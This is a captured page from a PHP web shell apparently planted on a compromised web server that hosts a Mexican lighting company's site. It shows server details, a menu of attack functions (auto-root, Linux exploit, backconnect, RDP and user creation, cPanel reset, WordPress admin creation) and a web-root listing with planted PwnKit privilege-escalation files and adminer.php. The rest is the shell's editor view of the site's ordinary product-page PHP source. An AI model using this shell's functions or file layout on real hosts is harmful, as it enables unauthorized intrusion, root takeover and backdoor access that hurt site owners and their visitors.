Linux cool-chatelet.209-46-124-25.plesk.page 6.8.0-60-generic #63-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 19:04:15 UTC 2025 x86_64
nginx/1.26.3
: 209.46.124.25 | : 216.73.216.5
Cant Read [ /etc/named.conf ]
8.3.21
beghelli.com.mx_t822czighbk
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
vhosts /
beghelli.com.mx /
httpdocs /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
ajax
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
cms
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
controller
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
.htaccess
385
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
404.html
2.91
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
authorized-agents.php
26.61
KB
-rw-r--r--
beghelli-group.php
31.82
KB
-rw-r--r--
certifications.php
28.79
KB
-rw-r--r--
downloads.php
26.53
KB
-rw-r--r--
fotometrias.php
5.12
KB
-rw-r--r--
index.php
42.95
KB
-rw-r--r--
info-rq.php
29.12
KB
-rw-r--r--
investor-relations.php
27.09
KB
-rw-r--r--
partnerships.php
28.16
KB
-rw-r--r--
privacy-notice.php
49.14
KB
-rw-r--r--
product-detail.php
28.31
KB
-rw-r--r--
product-literature.php
26.79
KB
-rw-r--r--
products-area.html
30.87
KB
-rw-r--r--
products-area.php
29.9
KB
-rw-r--r--
products-category.php
35.76
KB
-rw-r--r--
products-search.php
31.32
KB
-rw-r--r--
provider.php
34.14
KB
-rw-r--r--
providers-login.php
2.58
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
representant-login.php
2.61
KB
-rw-r--r--
representant.php
68.88
KB
-rw-r--r--
robots.txt
149
B
-rw-r--r--
sitemap.xml
79.16
KB
-rw-r--r--
success-cases.php
52.94
KB
-rw-r--r--
support.php
40.39
KB
-rw-r--r--
thank-you.php
23.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : products-area.php
<?php $ajaxRequest = false; require_once "controller/productController.php"; // Incluye el controlador // Obtener el nombre del área desde la URL if (isset($_GET['areaName'])) { $areaName = $_GET['areaName']; // Crear instancia del controlador $productController = new productController(); // Obtener categorías y productos de la área $data = $productController->get_area_and_products($areaName); // Validar si se encontró el área if ($data) { require_once 'controller/categoryController.php'; $controller = new categoryController(); // Categorías según las áreas $iluminacion = $controller->get_categories_by_area(1); $emergencia = $controller->get_categories_by_area(2); $horticultura = $controller->get_categories_by_area(3); $planet_sun = $controller->get_categories_by_area(4); $portatil = $controller->get_categories_by_area(5); $outlet = $controller->get_categories_by_area(6); $logica = $controller->get_categories_by_area(7); $sanificaaria = $controller->get_categories_by_area(8); $area = $data['area']; $categories = $data['categories']; } else { // Redirigir a una página de error si no se encuentra el área header("Location: error.php"); exit(); } } else { // Redirigir al home si no se recibe el nombre del área header("Location: index.php"); exit(); } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- Site Reference --> <meta name="description" content="Beghelli presenta sus productos"/> <meta name="keywords" content="beghelli méxico, iluminación, emergencia, luce solare, logica, SanificaAria"/> <meta name="author" content="Gustavo Bernal Cervantes"/> <meta name="theme-color" content="#012D3E"/> <link rel="canonical" href="https://beghelli.com.mx/"/> <title>Beghelli | <?php echo $area['name']; ?></title> <!-- Favicon Tags --> <link rel="apple-touch-icon" sizes="180x180" href="assets/favicon/apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="assets/favicon/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="assets/favicon/favicon-16x16.png"> <link rel="manifest" href="assets/favicon/site.webmanifest"> <!-- OG Meta Tags --> <meta property="og:title" content="Beghelli | Iluminación Industrial, Emergencia y Sistemas de Control"/> <meta property="og:url" content="https://beghelli.com.mx/"/> <meta property="og:image" content="assets/img/og.png"/> <meta property="og:type" content="website"/> <meta property="og:description" content="Beghelli presenta sus productos"/> <meta property="og:locale" content="es_MX"/> <!-- Resources --> <link href="https://fonts.cdnfonts.com/css/sofia-pro" rel="stylesheet"> <link rel="stylesheet" href="<?php echo WEBURL;?>css/normalize.css"> <link rel="stylesheet" href="<?php echo WEBURL;?>css/style.css"> <script src="https://kit.fontawesome.com/785530d049.js" crossorigin="anonymous"></script> <!-- Cliengo installation for beghelli.com.mx --> <script type="text/javascript"> (function () { var ldk = document.createElement('script'); ldk.type = 'text/javascript'; ldk.async = true; ldk.src = 'https://s.cliengo.com/weboptimizer/63b74475b5d786002a9a087c/63b74477b5d786002a9a0881.js?platform=dashboard'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ldk, s); })(); </script> </head> <body data-scroll=""> <header class="visible white"> <nav> <a href="<?php echo WEBURL;?>index.php"> <img src="<?php echo WEBURL;?>assets/img/logo-blue.svg" alt="Logo Beghelli"> </a> <div class="nav__categories"> <button data-menu="us">Grupo Beghelli</button> <button data-menu="products">Productos</button> <button data-menu="technical">Área técnica</button> <button data-menu="search"> <i class="fa-regular fa-magnifying-glass"></i> </button> </div> <div class="nav__contact"> <a href="<?php echo WEBURL;?>support.php">Soporte</a> <a href="<?php echo WEBURL;?>info-rq.php">Contacto</a> </div> <button class="nav__close-btn"> <i class="fa-light fa-xmark"></i> </button> <button class="nav__mob-btn"> <i class="fa-regular fa-bars-staggered"></i> </button> </nav> <div id="menu-us" class="header__menu gallery hidden"> <a href="<?php echo WEBURL;?>beghelli-group.php"> <h3>¿Quiénes somos?</h3> <img src="<?php echo WEBURL;?>assets/img/beghelli-group.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>authorized-agents.php"> <h3>Representantes de ventas</h3> <img src="<?php echo WEBURL;?>assets/img/authorized-agents.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>investor-relations.php"> <h3>Distribuidores</h3> <img src="<?php echo WEBURL;?>assets/img/investor-relations.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>partnerships.php"> <h3>Asociaciones</h3> <img src="<?php echo WEBURL;?>assets/img/partnerships.jpg" alt=""> </a> </div> <div id="menu-products" class="header__menu columns hidden"> <div class="header__menu-column"> <h3>Iluminación</h3> <?php foreach($iluminacion as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> <div class="spacer"></div> <div class="header__menu-column"> <h3>Emergencia</h3> <?php foreach($emergencia as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h3>Horticultura</h3> <?php foreach($horticultura as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> <div class="spacer"></div> <div class="header__menu-column"> <h3>Iluminación solar</h3> <?php foreach($planet_sun as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h3>Outlet</h3> <?php foreach($outlet as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h3>Iluminación Portátil</h3> <?php foreach($portatil as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> <div class="spacer"></div> <div class="header__menu-column"> <h3>Lógica</h3> <?php foreach($logica as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h3>Sanificaaria</h3> <?php foreach($sanificaaria as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> </div> <div id="menu-technical" class="header__menu gallery hidden"> <a href="<?php echo WEBURL;?>product-literature.php"> <h3>Catálogos</h3> <img src="<?php echo WEBURL;?>assets/img/product-literature.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>success-cases.php"> <h3>Casos de Éxito</h3> <img src="<?php echo WEBURL;?>assets/img/success-cases.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>downloads.php"> <h3>Información Técnica</h3> <img src="<?php echo WEBURL;?>assets/img/downloads.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>certifications.php"> <h3>Certificaciones</h3> <img src="<?php echo WEBURL;?>assets/img/certifications.jpg" alt=""> </a> </div> <div id="menu-search" class="header__menu search hidden"> <form action="<?php echo WEBURL;?>products-search.php" method="GET" class="home__search"> <input type="text" name="search-text" id="search-text" placeholder="¿Qué producto buscas?"> <button type="submit"> <i class="fa-solid fa-magnifying-glass"></i> </button> </form> </div> <div id="menu-mob" class="header__menu-mob hidden"> <form action="<?php echo WEBURL;?>products-search.php" method="GET" class="home__search"> <input type="text" name="search-text" id="search-text" placeholder="¿Qué producto buscas?"> <button type="submit"> <i class="fa-solid fa-magnifying-glass"></i> </button> </form> <div class="header__mob-collaps"> <div class="beghelli__collapsible"> <div class="beghelli__collap-header"> <h3>Grupo Beghelli</h3> <i class="fa-regular fa-chevron-down"></i> </div> <div class="beghelli__collap-cont"> <div class="header__mob-gallery"> <a href="<?php echo WEBURL;?>beghelli-group.php"> <h4>¿Quiénes somos?</h4> <img src="<?php echo WEBURL;?>assets/img/beghelli-group.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>authorized-agents.php"> <h4>Representates de ventas</h4> <img src="<?php echo WEBURL;?>assets/img/authorized-agents.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>investor-relations.php"> <h4>Distribuidores</h4> <img src="<?php echo WEBURL;?>assets/img/investor-relations.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>partnerships.php"> <h4>Asociaciones</h4> <img src="<?php echo WEBURL;?>assets/img/partnerships.jpg" alt=""> </a> </div> </div> </div> <div class="beghelli__collapsible"> <div class="beghelli__collap-header"> <h3>Productos</h3> <i class="fa-regular fa-chevron-down"></i> </div> <div class="beghelli__collap-cont"> <div class="header__mob-columns"> <div> <h4>Iluminación</h4> <?php foreach($iluminacion as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Iluminación solar</h4> <?php foreach($planet_sun as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Outlet</h4> <?php foreach($outlet as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Iluminación Portátil</h4> <?php foreach($portatil as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> <span class="spacer"></span> <div> <h4>Emergencia</h4> <?php foreach($emergencia as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Horticultura</h4> <?php foreach($horticultura as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Lógica</h4> <?php foreach($logica as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Sanificaaria</h4> <?php foreach($sanificaaria as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> </div> </div> </div> <div class="beghelli__collapsible"> <div class="beghelli__collap-header"> <h3>Grupo Beghelli</h3> <i class="fa-regular fa-chevron-down"></i> </div> <div class="beghelli__collap-cont"> <div class="header__mob-gallery"> <a href="<?php echo WEBURL;?>product-literature.php"> <h4>Catálogos</h4> <img src="<?php echo WEBURL;?>assets/img/product-literature.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>success-cases.php"> <h4>Casos de Éxito</h4> <img src="<?php echo WEBURL;?>assets/img/success-cases.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>downloads.php"> <h4>Información Técnica</h4> <img src="<?php echo WEBURL;?>assets/img/downloads.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>certifications.php"> <h4>Certificaciones</h4> <img src="<?php echo WEBURL;?>assets/img/certifications.jpg" alt=""> </a> </div> </div> </div> </div> </div> </header> <main> <section class="products__area"> <div class="beghelli__hierarchy"> <p>Productos:</p> <b><?php echo $area['name']; ?></b> </div> <h2><?php echo $area['name']; ?></h2> <!-- <p><?php echo $area['description']; ?></p> --> </section> <section class="products__gallery"> <button id="filters-btn"> <i class="fa-regular fa-sliders-simple"></i> Filters </button> <div class="products__gallery-filters"> <button id="close-filters"> <i class="fa-regular fa-xmark"></i> </button> <div class="product__filter"> <div class="product__filter-header"> Área <i class="fa-light fa-chevron-up"></i> </div> <?php echo $controller->generate_area_links($area['idArea']); ?> </div> <div class="product__filter"> <div class="product__filter-header"> Categoría <i class="fa-light fa-chevron-up"></i> </div> <?php echo $controller->generate_category_links($area['idArea'],NULL); ?> </div> <div class="product__filter"> <div class="product__filter-header"> Potencia <i class="fa-light fa-chevron-up"></i> </div> <div class="product__filter-options"> <button class="filter-btn current" data-filter-property="power" data-filter-value="all">Todos</button> <button class="filter-btn" data-filter-property="power" data-filter-value="100">100W</button> <button class="filter-btn" data-filter-property="power" data-filter-value="200">200W</button> <button class="filter-btn" data-filter-property="power" data-filter-value="300">300W</button> </div> </div> <div class="product__filter"> <div class="product__filter-header"> Protección IP <i class="fa-light fa-chevron-up"></i> </div> <div class="product__filter-options"> <button class="filter-btn current" data-filter-property="protection" data-filter-value="all">Todos</button> <?php foreach(IP as $ip) { echo "<button class='filter-btn' data-filter-property='protection' data-filter-value='$ip'>$ip</button>"; }?> </div> </div> <div class="product__filter"> <div class="product__filter-header"> Protección IK <i class="fa-light fa-chevron-up"></i> </div> <div class="product__filter-options"> <button class="filter-btn current" data-filter-property="ik" data-filter-value="all">Todos</button> <?php foreach(IK as $ik) { echo "<button class='filter-btn' data-filter-property='ik' data-filter-value='$ik'>$ik</button>"; }?> </div> </div> </div> <div class="products__gallery-items"> <?php foreach ($categories as $category): ?> <h3><?php echo $category['name']; ?></h3> <?php foreach ($category['products'] as $product): ?> <a href="<?php echo WEBURL;?>product-detail/<?php echo $product['clean_name'];?>" data-power="<?php echo $product['power']?>" data-protection="<?php echo $product['protection']?>" data-ik="<?php echo $product['ik']?>" class="product-frame"> <img src="<?php echo SERVERURL . 'uploads/products/' . $product['first_image']; ?>" alt="<?php echo $product['name']; ?>"> <div class="product-frame-texts"> <h5><?php echo $product['name']; ?></h5> <p><?php echo $product['description_short']; ?></p> </div> </a> <?php endforeach; ?> <?php endforeach; ?> </div> </section> </main> <footer> <img src="<?php echo WEBURL;?>assets/img/logo-blue.svg" alt="Beghelli logo azul"> <div class="footer__column"> <h4>Beghelli</h4> <a href="<?php echo WEBURL;?>beghelli-group.php">¿Quiénes somos?</a> <a href="<?php echo WEBURL;?>authorized-agents.php">Representantes de ventas</a> <a href="<?php echo WEBURL;?>investor-relations.php">Distribuidores</a> <a href="<?php echo WEBURL;?>partnerships.php">Asociaciones</a> </div> <div class="footer__column"> <h4>Área técnica</h4> <a href="<?php echo WEBURL;?>product-literature.php">Catálogos</a> <a href="<?php echo WEBURL;?>success-cases.php">Casos de éxito</a> <a href="<?php echo WEBURL;?>downloads.php">Información técnica</a> <a href="<?php echo WEBURL;?>certifications.php">Certificaciones</a> </div> <div class="footer__column"> <h4>Soporte</h4> <a href="<?php echo WEBURL;?>support.php">Preguntas frecuentes</a> <a href="<?php echo WEBURL;?>privacy-notice.php">Política de privacidad</a> </div> <div class="footer__row-second"> <div class="footer__links"> <a href="https://www.facebook.com/BeghelliMexico/" target="_blank" rel="noopener noreferrer"> <i class="fa-brands fa-facebook-f"></i> </a> <a href="https://www.instagram.com/beghellimexico/" target="_blank" rel="noopener noreferrer"> <i class="fa-brands fa-instagram"></i> </a> <a href="https://www.linkedin.com/company/beghelli-méxico/?originalSubdomain=mx" target="_blank" rel="noopener noreferrer"> <i class="fa-brands fa-linkedin-in"></i> </a> <a href="https://www.youtube.com/channel/UC11tlEqg4pWhmCj8mYY_pNg" target="_blank" rel="noopener noreferrer"> <i class="fa-brands fa-youtube"></i> </a> <div class="footer__global"> <button id="global-btn"> <i class="fa-regular fa-earth-americas"></i> México <i class="fa-solid fa-chevron-up"></i> </button> <div class="footer__global-drop-up"> <div> <div class="footer__global-links"> <h5>Global Website</h5> <a href="https://www.beghelli.it/it" target="_blank" rel="noopener noreferrer">Italiano</a> <a href="https://www.beghelli.it/en" target="_blank" rel="noopener noreferrer">English</a> <h5>Czech Republic</h5> <a href="https://www.beghelli.it/cs-cz" target="_blank" rel="noopener noreferrer">Czech</a> <a href="https://www.beghelli.it/en-cz" target="_blank" rel="noopener noreferrer">English</a> <a href="https://www.beghelli.it/en-cz" target="_blank" rel="noopener noreferrer">Russian</a> <h5>Germany</h5> <a href="https://www.beghelli.it/de-de" target="_blank" rel="noopener noreferrer">Deutsch</a> <a href="https://www.beghelli.it/en-de" target="_blank" rel="noopener noreferrer">English</a> <h5>Hungary</h5> <a href="https://www.beghelli.it/hu-hu" target="_blank" rel="noopener noreferrer">Magyar</a> <h5>Poland</h5> <a href="https://www.beghelli.it/pl-pl" target="_blank" rel="noopener noreferrer">Polski</a> <h5>Company website</h5> <a href="https://www.beghelliusa.com/" target="_blank" rel="noopener noreferrer">Beghelli Inc. (USA)</a> <a href="https://www.beluce.com/" target="_blank" rel="noopener noreferrer">Beghelli Canada Inc. (Canada)</a> <a href="https://www.beghelli.com.mx/" target="_blank" rel="noopener noreferrer">Beghelli de México (México)</a> <a href="https://www.beghelliasia.com/" target="_blank" rel="noopener noreferrer">Beghelli Asia Pacific Ltd (Hong Kong)</a> <a href="https://www.beghellichina.com/" target="_blank" rel="noopener noreferrer">Beghelli China (People's Respublic of China)</a> <a href="https://www.beghelli.it/cs-cz" target="_blank" rel="noopener noreferrer">Beghelli Elplast (Czhech Republic)</a> <a href="https://www.beghelli.it/de-de" target="_blank" rel="noopener noreferrer">Beghelli Präzisa (Germany)</a> <a href="https://www.beghelli.it/pl-pl" target="_blank" rel="noopener noreferrer">Beghelli Ploska (Poland)</a> <a href="https://www.beghelli.it/hu-hu" target="_blank" rel="noopener noreferrer">Beghelli Hungary (Hungary)</a> <a href="https://www.beghelli.it/it" target="_blank" rel="noopener noreferrer">Beghelli S. p. A. (Italy)</a> </div> </div> </div> </div> </div> <div class="footer__phone"> <h5>Llámanos</h5> <p>Lunes a viernes de 8:00 a 17:00 hrs</p> <i class="fa-light fa-phone-volume"></i> <span>442 221 6215</span> </div> </div> <div class="footer__row-third"> <div class="footer__simple-links"> <a href="<?php echo WEBURL;?>privacy-notice.php">Política de privacidad</a> <div> <i class="fa-solid fa-lock"></i> <a href="<?php echo WEBURL;?>representant-login.php">Soy representante</a> </div> <div> <i class="fa-solid fa-lock"></i> <a href="<?php echo WEBURL;?>providers-login.php">Soy marketing partner</a> </div> </div> <p class="text">© Beghelli México - Av. del Marqués No. 70 Int. 4 Parque Industrial Bernardo Quintana, El Marqués, Qro.</p> </div> </footer> <!-- Scripts --> <script src="<?php echo WEBURL;?>js/general.js"></script> <script src="<?php echo WEBURL;?>js/collapsibles.js"></script> <script src="<?php echo WEBURL;?>js/products-gallery.js"></script> </body> </html>
Close